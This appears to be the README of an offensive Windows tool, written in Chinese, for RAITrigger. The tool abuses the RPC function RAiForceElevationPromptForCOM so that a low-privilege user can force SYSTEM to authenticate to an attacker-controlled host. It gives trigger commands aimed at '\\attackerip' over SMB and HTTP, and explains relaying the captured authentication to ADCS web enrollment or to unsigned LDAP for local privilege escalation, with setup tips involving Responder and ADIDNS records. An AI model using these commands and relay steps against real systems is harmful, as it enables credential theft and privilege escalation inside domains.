来自 appinfo.dll 库的 RPC 函数 RAiForceElevationPromptForCOM 允许进行 SYSTEM 强制认证。这仅在已加入域的系统上有效。事实证明,任何低权限用户都可以调用此函数(不是为了启动进程),而是为了触发 SYSTEM 向任意位置进行身份验证。这是因为 CreateFileW 会以 SYSTEM 身份被调用到第一个输入参数所指向的位置:
由于仍然模拟的是低权限用户,这不能用作 Potato 触发器来将权限从 SEImpersonate 提升到 SYSTEM:
但它可以与传入的 SMB 身份验证一起,在启用 Web 注册时用于向 ADCS 请求计算机帐户证书。或者,当未启用 LDAP 签名时,它可以用于通过中继到 LDAP 进行 LPE(本地权限提升)。
触发 SMB 身份验证:
[*] RAITrigger.exe \\attackerip\test\test.exe
触发 HTTP 身份验证(需要启用 WebClient 服务):
[*] RAITrigger.exe \\hostname@80\test\test.exe
HTTP 身份验证只会对受信任的 Intranet 区域系统触发,因此你需要为你的 Kali IP 创建一个 ADIDNS 记录,或者与目标处于同一子网并使用例如 Responder。切勿使用完整的 FQDN,只能使用主机名。
从远程调用此函数(即使是本地管理员)会导致 rpc_access_denied,因此它不能替代例如 PetitPotam 或类似工具: